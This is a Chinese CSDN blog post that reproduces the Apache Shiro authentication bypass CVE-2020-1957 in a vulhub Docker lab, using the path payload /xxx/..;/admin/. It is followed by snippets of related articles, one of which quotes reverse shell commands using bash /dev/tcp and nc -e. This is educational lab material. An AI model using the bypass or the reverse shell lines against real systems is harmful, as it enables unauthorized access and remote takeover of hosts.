vulhub中Apache Shiro 认证绕过漏洞复现(CVE-2020-1957)

最新推荐文章于 2024-04-26 09:25:31 发布
最新推荐文章于 2024-04-26 09:25:31 发布
阅读量199 收藏
点赞数 2
分类专栏: vulhub漏洞复现 文章标签: web安全 apache
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yougexiaojiuguan/article/details/136967131
版权

Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。

在Apache Shiro 1.5.2以前的版本中,在使用Spring动态控制器时,攻击者通过构造..;这样的跳转,可以绕过Shiro中对目录的权限限制。

环境搭建

执行如下命令启动一个搭载Spring 2.2.2与Shiro 1.5.1的应用:

docker compose up -d

环境启动后,访问http://your-ip:8080即可查看首页。

漏洞复现

直接请求管理页面/admin/,无法访问,将会被重定向到登录页面:

构造恶意请求/xxx/..;/admin/,即可绕过权限校验,访问到管理页面:

余生有个小酒馆
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
Apache Shiro身份验证绕过漏洞(CVE-2020-13933)
07-17
直接使用java -jar srping....war命令运行即可 执行之后,访问http://主机的IP:8888/admin/*或者http://主机的IP:8888/login
CVE-2020-13933 靶场: shiro 认证绕过漏洞.zip
01-14
在靶场安全专业人员可以模拟攻击者的行为,发现系统和应用的漏洞,并进行渗透测试,从而及时修复和改进防御机制。同时,这也为防御方提供了锻炼机会,通过对抗攻击提高防御能力。 靶场的搭建还促进了团队协作与...
Shiro 身份验证绕过CVE-2020-13933)
qq_44484541的博客
11-01 582
Apache Shiro身份验证绕过漏洞CVE-2020-11989的修复补丁存在缺陷,在1.5.3及其之前的版本,由于shiro在处理url时与spring仍然存在差异,依然存在身份校验绕过漏洞由于处理身份验证请求时出错,远程攻击者可以发送特制的HTTP请求,绕过身份验证过程并获得对应用程序的未授权访问。1.不在请求路由指定资源名称的时候,不会触发身份验证,也不会有资源返回;3.构造poc请求指定资源,不触发身份验证,并绕过权限(%3b绕过)2.在请求路由指定资源名称时,302跳转到身份验证页面;
vulhub漏洞复现1
xhscxj的博客
05-23 1926
CVE-2018-18778 CVE-2018-18778是基于mini_httpd的一个任意文件读取漏洞 Mini_httpd是一个微型的Http服务器,在占用系统资源较小的情况下可以保持一定程度的性能(约为Apache的90%),因此广泛被各类IOT(路由器,交换器,摄像头等)作为嵌入式服务器。而包括华为,zyxel,海康威视,树莓派等在内的厂商的旗下设备都曾采用Mini_httpd组件。 影响版本:ACME mini_httpd before 1.30 分析 当mini_httpd开启虚拟主机时,此
命令执行漏洞【2】vulhub远程命令执行漏洞复现
最新发布
LfanBQX的博客
04-26 363
bash -i >& /dev/tcp/10.1.1.101/6666 0>&1 (被控制端未装nc,就可以使用bash(linux都能连接))在linux特有临时目录/tmp下创建空文件,由于通常该目录不会存在该名称的文件,所以可以作为命令执行的验证命令.被控制端 nc 10.1.1.101 6666 -e /bin/bash。可看到在/tmp/路径下,已成功创建的success文件,说明漏洞利用成功。(1)s2-061漏洞复现。(2)s2-059漏洞复现
(二)vulhub专栏:Shiro漏洞复现汇总
云舒的博客
06-03 1889
Shiro漏洞复现汇总
[ vulhub漏洞复现篇 ] vulhub 漏洞集合(含漏洞复现文章连接)
qq_51577576的博客
09-21 1万+
介绍:Vulhub是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。 计划:这里记录了 vulhub 所有的漏洞,本专栏也会将这些漏洞全部复现,欢迎持续订阅 我也会不定期再间更新复现文章链接 目的:以复现 vulhub 漏洞为路径,展示不同的渗透思路及手法,同类漏洞我会尽量用多种渗透思路进行复现,不仅仅是提高个人能力,也是想再 CSDN 这个平台认识更多的安全爱好者
vulhub靶场搭建及漏洞复现教程
热门推荐
Cwillchris的博客
03-25 2万+
准备一个纯净的ubantu系统 1、先更新一下安装列表 sudo apt-get update 2、安装docker.io sudo apt install docker.io 查看是否安装成功 docker -v 3、查看是否安装pip pip -V 检测到未安装,提示是否安装,按y下载 再次输入pip -V查看是否安装成功 4、安装docker-compose pip install docker-compose 查看是否安装成功 docker
Kali 搭建Vulhub靶场 (详细)
qq_43508668的博客
04-21 1492
这里写目录标题安装Docker安装pip安装docker-compose下载Vulhub 安装Docker 检查软件更新 apt-get update 安装https协议、CA证书 apt-get install -y apt-transport-https ca-certificates 安装docker apt install docker.io docker -v 查看是否安装成功 启动docker systemctl start docker 显示docker信息 docker ps -
shiro权限绕过漏洞分析(cve-2020-1957) _ Spoock1
08-03
然而,如标题和描述提到的,存在一个名为CVE-2020-1957安全漏洞,允许攻击者绕过Shiro的权限检查,从而访问受保护的资源。 该漏洞主要发生在Shiro 1.5.1及更早版本,当用户请求的URL(URL1)通过Shiro的权限...
shiro认证绕过漏洞分析(CVE-2020-13933)1
08-03
在讨论Shiro认证绕过漏洞CVE-2020-13933之前,我们首先需要了解Shiro的基本工作原理。 Shiro认证过程通常包括以下几个步骤: 1. 用户提交凭证(如用户名和密码)。 2. Shiro的 Realm 对象验证这些凭证, Realm ...
漏洞复现vulhub 间件漏洞
qq_46421742的博客
08-09 395
tomcat是一个开源而且免费的jsp服务器,默认端口:8080,属于轻量级应用服务器。它可以实现 JavaWeb程序的装载,是配置JSP(Java Server Page)和JAVA系统必备的一款环境。在历史上也披露出来了很多的漏洞,本文讲几个经典的漏洞复现过程。
vulhub-spring漏洞复现
qq_51922767的博客
09-14 2575
vulhub-spring漏洞复现
vulhub漏洞复现-saltstack(CVE-2020-11651、CVE-2020-11652)越权命令执行/遍历目录
遇事不决冲冲冲
10-10 4670
SaltStack 基于Python开发的一套C/S架构配置管理工具,通过部署SaltStack,可以在成千万台服务器上做到批量执行命令,根据不同业务进行配置集化管理、分发文件、采集服务器数据、操作系统基础及软件包管理等,简单来说就是可以集管理各种各样的服务器,但在 SaltStack < 2019.2.4,SaltStack < 3000.2版本出现了认证绕过漏洞,通过构造恶意请求,可以绕过 Salt Master 的验证逻辑,调用相关未授权函数功能,从而可以造成远程任意命令执行
vulhub漏洞复现77_zabbix
weixin_44193247的博客
02-14 1536
vulhub漏洞复现练习篇
漏洞复现vulhub unomi/CVE-2020-13942
qq_46421742的博客
07-03 406
进入靶场页面,使用burp进行抓包,发送到重放器模块构造数据包,更改请求方式,将get包改为post请求包,删除多余的字段,保留Host、User-Agent和Content-Length字段,然后添加以下数据(通过MVEL表达式执行任意命令),在DNSLog添加成自己的地址(DNSLog平台生成的随机域名),此处访问不到,尝试几次还是不行,查了相关复现资料,阅读很多文章,最终发现有博主出现和我一样的问题。本文属于个人笔记,仅用于学习,禁止使用于任何违法行为,任何违法行为与本人无关。重新拉取环境,成功。
vulhub靶场Webmin(CVE-2019-15107)漏洞复现
weixin_45095113的博客
12-12 766
Webmin(CVE-2019-15107)漏洞复现
Vulhub靶场之Tomcat漏洞复现
weixin_66717977的博客
06-30 434
tomcat漏洞复现
vulhub漏洞复现78_Weblogic
weixin_44193247的博客
02-15 1909
vulhub漏洞复现练习篇
spring boot 解决Apache Shiro身份认证绕过漏洞CVE-2023-22602)
06-02
对于Spring Boot项目Apache Shiro身份认证绕过漏洞CVE-2023-22602),可以通过以下步骤进行解决: 1.升级Apache Shiro到1.7.1或更高版本。可以在项目的Maven或Gradle依赖更新Apache Shiro的版本。 2.检查...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值